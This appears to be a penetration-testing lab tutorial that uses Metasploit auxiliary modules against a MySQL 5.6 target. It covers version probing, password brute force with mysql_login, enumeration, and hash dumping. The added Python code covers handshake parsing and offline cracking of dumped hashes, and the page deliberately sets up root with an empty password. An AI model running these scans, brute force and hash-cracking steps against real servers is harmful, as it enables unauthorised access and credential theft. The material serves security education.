Metasploit Host Scanning: Service Scanning with Auxiliary Modules (MySQL as the Example)

    Service scanning with auxiliary modules, using the MySQL service as the example.

    Search for the available MySQL scanner modules:

    root@kali:~# msfconsole   # start the Metasploit console
    
    ...
    
    msf5 > search scanner/mysql   # list the available MySQL scanner modules
    
    Matching Modules
    ================
    
       #  Name                                               Disclosure Date  Rank    Check  Description
       -  ----                                               ---------------  ----    -----  -----------
       0  auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  No     MySQL Authentication Bypass Password Dump
       1  auxiliary/scanner/mysql/mysql_file_enum                             normal  No     MYSQL File/Directory Enumerator
       2  auxiliary/scanner/mysql/mysql_hashdump                              normal  No     MYSQL Password Hashdump
       3  auxiliary/scanner/mysql/mysql_login                                 normal  No     MySQL Login Utility
       4  auxiliary/scanner/mysql/mysql_schemadump                            normal  No     MYSQL Schema Dump
       5  auxiliary/scanner/mysql/mysql_version                               normal  No     MySQL Server Version Enumeration
       6  auxiliary/scanner/mysql/mysql_writable_dirs                         normal  No     MYSQL Directory Write Test

    1. mysql_version: checks whether the server accepts connections from the scanning host; if it does, the version number is reported. The module only reads the server's first packet, so a server that rejects the client host still answers with an error, which also confirms that MySQL is listening.

    msf5 > use auxiliary/scanner/mysql/mysql_version   # read the server greeting: version if the host is allowed, an error otherwise
    
    msf5 auxiliary(scanner/mysql/mysql_version) > show options
    
    Module options (auxiliary/scanner/mysql/mysql_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    3306             yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_version) > run   # here the target refuses connections from the scanning host (MySQL error 1130)
    
    [*] 192.168.43.101:3306   - 192.168.43.101:3306 is running MySQL, but responds with an error: x04Host 'PCPZ8VZPNONCTTV' is not allowed to connect to this MySQL server
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    For convenience in the lab, reconfigure MySQL on the target to accept remote connections. The statement below is deliberately the weak setup the rest of this page exploits: root reachable from any host ('%') with an empty password, so drop that account again once the exercise is over. GRANT ... IDENTIFIED BY works on the 5.6 server used here but was removed in MySQL 8.0, where you would CREATE USER first and then GRANT.

    mysql> grant all privileges on *.* to 'root'@'%' identified by '' with grant option;
    
    mysql> flush privileges;

    Run the module again: the version number is now reported.

    msf5 auxiliary(scanner/mysql/mysql_version) > run
    
    [+] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL 5.6.17 (protocol 10)
    [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
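The check mysql_version performs, as an added example written for this page (it is not Metasploit's code): a small Python parser for the server's first packet, which carries either the Handshake V10 greeting with the version string or the ERR packet a host-restricted server sends instead. The sample packets, the connection id and the scramble are constructed here; probe() is the only part that touches the network and assumes a reachable host.

```python
"""What mysql_version actually looks at: the first packet a MySQL server sends after
TCP connect. An allowed host gets a Handshake V10 greeting (protocol 10, version string,
20-byte scramble); a host that no mysql.user row permits gets an ERR packet instead.
Added example for this page, not Metasploit code; the sample packets are constructed,
and the connection id, scramble and hostname in them are made up."""
import socket
import struct

CLIENT_PROTOCOL_41 = 0x00000200          # capability bits from the MySQL protocol
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def frame(payload: bytes, seq: int = 0) -> bytes:
    """MySQL packet: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def build_greeting(version: bytes, conn_id: int, scramble: bytes, plugin: bytes) -> bytes:
    """Construct a Handshake V10 packet laid out the way 5.x/8.x servers send it."""
    assert len(scramble) == 20
    caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    p = b"\x0a" + version + b"\x00" + struct.pack("<I", conn_id)
    p += scramble[:8] + b"\x00"                      # auth-plugin-data part 1, filler
    p += struct.pack("<H", caps & 0xFFFF)
    p += b"\x21" + struct.pack("<H", 0x0002)         # charset utf8, status SERVER_STATUS_AUTOCOMMIT
    p += struct.pack("<H", caps >> 16)
    p += bytes([len(scramble) + 1]) + b"\x00" * 10   # auth-plugin-data length, reserved
    p += scramble[8:] + b"\x00"                      # part 2, NUL-terminated
    p += plugin + b"\x00"
    return frame(p)


def build_error(code: int, message: bytes) -> bytes:
    """Pre-auth ERR packet: 0xFF, 2-byte code, message. No '#SQLSTATE' prefix, because the
    server cannot yet know whether the client speaks CLIENT_PROTOCOL_41."""
    return frame(b"\xff" + struct.pack("<H", code) + message)


def parse_first_packet(data: bytes) -> dict:
    """Decode the server's first packet into a dict: kind 'greeting', 'error' or 'unknown'."""
    if len(data) < 5:
        raise ValueError("too short for a MySQL packet")
    length = data[0] | data[1] << 8 | data[2] << 16
    p = data[4:4 + length]
    if len(p) != length:
        raise ValueError("truncated packet")
    if p[0] == 0xFF:
        code = struct.unpack_from("<H", p, 1)[0]
        msg = p[3:]
        if msg[:1] == b"#":                          # SQLSTATE is only present post-auth
            msg = msg[6:]
        return {"kind": "error", "code": code, "message": msg.decode("utf-8", "replace")}
    if p[0] != 10:
        return {"kind": "unknown", "protocol": p[0]}
    end = p.index(b"\x00", 1)
    info = {"kind": "greeting", "protocol": 10, "server_version": p[1:end].decode()}
    off = end + 1
    info["connection_id"] = struct.unpack_from("<I", p, off)[0]
    off += 4
    scramble = p[off:off + 8]                        # part 1 of the scramble
    off += 8 + 1                                     # skip it and the filler byte
    caps = struct.unpack_from("<H", p, off)[0]
    off += 2
    if off < len(p):                                 # extended fields (every modern server)
        off += 1 + 2                                 # charset, status flags
        caps |= struct.unpack_from("<H", p, off)[0] << 16
        off += 2
        auth_len = p[off]
        off += 1 + 10                                # auth-plugin-data length, reserved bytes
        if caps & CLIENT_SECURE_CONNECTION:
            n = max(13, auth_len - 8)
            scramble += p[off:off + n][:-1]          # part 2 minus its NUL terminator
            off += n
        if caps & CLIENT_PLUGIN_AUTH:
            info["auth_plugin"] = p[off:p.index(b"\x00", off)].decode()
    info["capabilities"] = caps
    info["scramble"] = scramble
    return info


def probe(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """Live version of the check: connect and decode whatever the server sends first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return parse_first_packet(s.recv(4096))


# Constructed samples: a 5.6.17 greeting, and the error 1130 a host-restricted server returns.
SAMPLE_SCRAMBLE = b"abcdefghijklmnopqrst"
SAMPLE_GREETING = build_greeting(b"5.6.17", 7, SAMPLE_SCRAMBLE, b"mysql_native_password")
SAMPLE_DENIED = build_error(
    1130, b"Host 'PCPZ8VZPNONCTTV' is not allowed to connect to this MySQL server")

if __name__ == "__main__":
    print(parse_first_packet(SAMPLE_GREETING))
    print(parse_first_packet(SAMPLE_DENIED))
```

Error 1130 is 0x046A, sent little-endian as the bytes 6A 04 right after the 0xFF marker; the stray x04 in the page's first run is most likely that second byte being printed together with the message. Either way the server has already confirmed that it runs MySQL and revealed which name it resolved for the scanner, which is why the refused run above still counts as a finding.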

    2. mysql_login: brute force

    Once the server accepts remote connections, the password can be guessed online.

    The module ships no default wordlist, so first create a simple pass.txt with one candidate password per line.

    msf5 > use auxiliary/scanner/mysql/mysql_login
       
    msf5 auxiliary(scanner/mysql/mysql_login) > show options 
    
    Module options (auxiliary/scanner/mysql/mysql_login):
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   false            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false            no        Add all passwords in the current database to the list
       DB_ALL_USERS      false            no        Add all users in the current database to the list
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             3306             yes       The target port (TCP)
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads (max one per host)
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false            no        Try the username as the password for all users
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts
    
    msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
    USERNAME => root
    msf5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/pass.txt
    PASS_FILE => /root/pass.txt
    msf5 auxiliary(scanner/mysql/mysql_login) > run   # the exploit command does the same thing
    
    [+] 192.168.43.101:3306   - 192.168.43.101:3306 - Found remote MySQL version 5.6.17
    [!] 192.168.43.101:3306   - No active DB -- Credential data will not be saved!
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:1 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:2 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:3 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:4 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:5 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [+] 192.168.43.101:3306   - 192.168.43.101:3306 - Success: 'root:'
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    The empty password was found. BLANK_PASSWORDS is false by default, so to have the module try the empty password on its own set BLANK_PASSWORDS true rather than relying on an empty line in pass.txt; set STOP_ON_SUCCESS true to stop at the first working credential. Note the warning in the output: without a connected database the found credentials are not saved.

    3. mysql_enum: enumerate database information

    msf5 > use auxiliary/admin/mysql/mysql_enum   # note: mysql_enum lives under admin/, not scanner/
    
    msf5 auxiliary(admin/mysql/mysql_enum) > show options 
    
    Module options (auxiliary/admin/mysql/mysql_enum):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       PASSWORD                   no        The password for the specified username
       RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT     3306             yes       The target port (TCP)
       USERNAME                   no        The username to authenticate as
    
    msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root   # the password is empty, so PASSWORD stays unset; otherwise set PASSWORD as well
    
    msf5 auxiliary(admin/mysql/mysql_enum) > run
    
    ...
    (the output lists the MySQL version, the operating system architecture, file paths and password hashes, among other details)
    ...

    4. mysql_hashdump: dump password hashes

    This module dumps the password hashes of every account the connecting user is allowed to read from mysql.user, so with anything less than a root login it is of limited use.

    msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump 
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options 
    
    Module options (auxiliary/scanner/mysql/mysql_hashdump):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       PASSWORD                   no        The password for the specified username
       RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT     3306             yes       The target port (TCP)
       THREADS   1                yes       The number of concurrent threads (max one per host)
       USERNAME                   no        The username to authenticate as
    
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
    USERNAME => root
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > run   # root's password is empty, so the loot lines below carry no hash; the line with an empty user name is MySQL's anonymous account
    
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: :
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
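An added example, written for this page rather than taken from Metasploit, that ties section 2 and section 4 together by implementing mysql_native_password on both sides: stored_hash produces the value mysql_hashdump saves as loot, client_response and server_check are the per-connection exchange mysql_login drives, online_guess simulates the brute force, and crack_loot does the offline equivalent on dumped hashes. The loot lines, user names and wordlist are constructed; only the hashing scheme is MySQL's.

```python
"""mysql_native_password from both ends, added for this page (not Metasploit code).
Covers section 2 (what mysql_login sends on each connection and how the server checks it)
and section 4 (what mysql.user stores, i.e. the HashString mysql_hashdump saves as loot, and
how such loot is cracked offline). The loot lines and wordlist below are constructed; the
account names and passwords in them are made up."""
import hashlib
import hmac
import secrets


def sha1(b: bytes) -> bytes:
    return hashlib.sha1(b).digest()


def stored_hash(password: str) -> str:
    """mysql.user value for mysql_native_password: '*' + hex(SHA1(SHA1(pw))).upper().
    An empty password is stored as an empty string, which is why the page's loot reads 'root:'."""
    if password == "":
        return ""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def client_response(password: str, scramble: bytes) -> bytes:
    """Client side of the handshake: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw))).
    The scramble is 20 server-chosen bytes from the greeting; an empty password sends nothing."""
    if password == "":
        return b""
    h1 = sha1(password.encode())
    mask = sha1(scramble + sha1(h1))
    return bytes(a ^ b for a, b in zip(h1, mask))


def server_check(stored: str, scramble: bytes, response: bytes) -> bool:
    """Server side: unmask SHA1(pw) = response XOR SHA1(scramble || stored) and verify that
    SHA1 of it equals the stored double hash. Only the double hash is ever needed."""
    if stored == "":
        return response == b""
    if len(response) != 20:
        return False
    h2 = bytes.fromhex(stored[1:])
    mask = sha1(scramble + h2)
    h1 = bytes(a ^ b for a, b in zip(response, mask))
    return hmac.compare_digest(sha1(h1), h2)


def online_guess(stored: str, candidates, stop_on_success: bool = True):
    """Simulate mysql_login: each attempt is a fresh connection with a fresh scramble, so the
    response from one attempt says nothing about the next. Returns [(candidate, ok), ...]."""
    tried = []
    for pw in candidates:
        scramble = secrets.token_bytes(20)           # chosen by the server, never the client
        ok = server_check(stored, scramble, client_response(pw, scramble))
        tried.append((pw, ok))
        if ok and stop_on_success:                   # STOP_ON_SUCCESS behaviour
            break
    return tried


def crack_loot(loot_lines, wordlist):
    """Offline attack on mysql_hashdump loot ('user:hash' per line): hash each candidate once,
    then look every dumped hash up in the table. No network, no per-guess scramble, no log noise."""
    table = {stored_hash(w): w for w in wordlist}
    table[""] = ""                                   # empty hash <-> empty password
    found = {}
    for line in loot_lines:
        user, _, h = line.partition(":")
        if h.upper() in table:
            found[user] = table[h.upper()]
    return found


# Constructed loot in the format the page shows, plus a small wordlist.
SAMPLE_LOOT = [
    "root:",                                         # empty password, as on the page
    ":",                                             # MySQL's anonymous account, no password
    "app:" + stored_hash("Winter2020!"),             # a user whose password is in the list
    "dba:" + stored_hash("not-in-the-wordlist"),
]
SAMPLE_WORDLIST = ["1", "2", "3", "4", "5", "Winter2020!", "password"]

if __name__ == "__main__":
    print(online_guess("", ["1", "2", "3", "4", "5", ""]))
    print(crack_loot(SAMPLE_LOOT, SAMPLE_WORDLIST))
```

Two things in the page's output follow directly from the code: an empty password is stored as an empty string and authenticates with an empty response, which is why both the brute force and the hashdump show 'root:' with nothing after the colon; and the stored double hash is all the server needs, so any login that can read mysql.user can hand the hashes to an offline cracker, where one SHA1 pair per candidate replaces one TCP connection per guess. This applies to the mysql_native_password plugin the 5.6 target uses (the greeting names the plugin); MySQL 8.0 defaults to caching_sha2_password, which is a different scheme.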
    Original post: https://www.cnblogs.com/zhengna/p/12856324.html